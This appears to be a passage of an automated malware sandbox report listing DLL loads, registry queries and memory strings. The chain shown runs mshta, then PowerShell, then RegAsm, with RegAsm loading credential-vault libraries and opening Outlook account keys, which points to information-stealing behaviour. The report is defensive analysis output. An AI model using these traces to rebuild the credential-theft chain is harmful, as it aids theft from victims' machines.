                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065247057.0000000006EB6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.pdb source: powershell.exe, 00000001.00000002.2119899349.00000000050F7000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2065318838.0000000006EC7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2279074921.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.2337874046.0000000009D70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000009.00000002.2306155139.0000000009771000.00000004.00000800.00020000.00000000.sdmp
